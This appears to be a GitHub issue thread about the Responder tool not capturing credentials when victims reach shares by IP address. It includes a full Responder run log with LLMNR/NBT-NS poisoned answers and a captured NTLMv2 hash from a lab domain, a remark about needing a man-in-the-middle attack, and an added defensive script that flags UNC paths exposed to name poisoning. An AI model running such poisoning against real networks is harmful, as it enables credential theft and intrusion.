Does not work when the victim uses the IP address to access the shared folders
MiMaz7707 opened this issue · 3 comments
Hello,
It works fine if the victim uses a hostname in the UNC path, but it doesn't if the victim uses the server IP address or the FQDN.

```
responder -I eth0 -dwv
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [eth0]
Responder IP [192.168.117.200]
Responder IPv6 [fe80::9024:b852:9137:c6f]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables:
Responder Machine Name [WIN-OE0U3JW4FXX]
Responder Domain Name [WYT3.LOCAL]
Responder DCE-RPC Port [46345]
[+] Listening for events...
[*] [LLMNR] Poisoned answer sent to fe80::4980:feb4:6fae:992d for name S
[*] [NBT-NS] Poisoned answer sent to 192.168.117.10 for name S (service: File Server)
[*] [LLMNR] Poisoned answer sent to 192.168.117.10 for name S
[*] [LLMNR] Poisoned answer sent to 192.168.117.10 for name S
[*] [LLMNR] Poisoned answer sent to fe80::4980:feb4:6fae:992d for name S
[SMB] NTLMv2-SSP Client : fe80::4980:feb4:6fae:992d
[SMB] NTLMv2-SSP Username : MYLAB\test
[SMB] NTLMv2-SSP Hash : test::MYLAB:d2f4d55a1d326bac:D46E471C6F7E781439635BA527C2C347:010100000000000080AEA9FFDDCCDA018E011B63B184DEBE0000000002000800570059005400330001001E00570049004E002D004F0045003000550033004A005700340046005800580004003400570049004E002D004F0045003000550033004A00570034004600580058002E0057005900540033002E004C004F00430041004C000300140057005900540033002E004C004F00430041004C000500140057005900540033002E004C004F00430041004C000700080080AEA9FFDDCCDA01060004000200000008003000300000000000000001000000002000000056638E940A2EAC0BE9E6C03440C4574E6C72404BC79D31E9D138D6E79566580A0010000000000000000000000000000000000009000C0063006900660073002F005300000000000000000000000000
```
LLMNR is a name resolution protocol; there is no name to resolve when you use an IP.
Hello,
I get it, so it needs to do a MiTM attack to get a response from victims that use an IP address.
Thanks.
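Seen from the defending side, the reply above means that only share paths written with a bare hostname depend on LLMNR/NBT-NS and can receive a spoofed answer. The Python below is an added example, not part of the issue thread or of Responder: it audits a list of UNC paths (for instance from logon scripts or drive mappings) and flags the ones whose host is a single-label name. The function names and sample paths are constructed for illustration, and treating FQDNs as DNS-resolved is an assumption that matches the behaviour reported in the issue.

```python
import ipaddress
import re

# \\host\share\... : the host is everything between the leading \\ and the next separator
UNC_RE = re.compile(r"^\\\\([^\\/]+)")
V6_SUFFIX = ".ipv6-literal.net"  # Windows spelling of an IPv6 literal inside a UNC path


def unc_host(path):
    """Return the host component of a UNC path."""
    m = UNC_RE.match(path.strip())
    if m is None:
        raise ValueError(f"not a UNC path: {path!r}")
    return m.group(1)


def classify_host(host):
    """Classify a UNC host as 'ip', 'fqdn' or 'single-label'."""
    h = host.lower()
    candidate = h
    if h.endswith(V6_SUFFIX):
        # 'fe80--1s4' -> 'fe80::1' (dashes stand for colons, 's' starts the zone id)
        candidate = h[: -len(V6_SUFFIX)].split("s", 1)[0].replace("-", ":")
    try:
        ipaddress.ip_address(candidate)
        return "ip"  # nothing to resolve, so no LLMNR/NBT-NS query is sent
    except ValueError:
        pass
    # Assumption: a multi-label name is resolved through DNS, as the issue reports.
    return "fqdn" if "." in h else "single-label"


def audit(paths):
    """Return (path, kind, relies_on_llmnr_nbtns) for each UNC path."""
    rows = []
    for p in paths:
        kind = classify_host(unc_host(p))
        rows.append((p, kind, kind == "single-label"))
    return rows


# Constructed sample paths; only the name "S" appears in the log above.
SAMPLE_PATHS = [r"\\S\share", r"\\192.168.117.50\data",
                r"\\fs01.mylab.example\data", r"\\fe80--1s4.ipv6-literal.net\c$"]

if __name__ == "__main__":
    for path, kind, exposed in audit(SAMPLE_PATHS):
        print(f"{path:40} {kind:13} {'REVIEW' if exposed else 'ok'}")
```

Paths flagged for review are candidates for rewriting with an FQDN, or for disabling LLMNR and NBT-NS on the clients that use them.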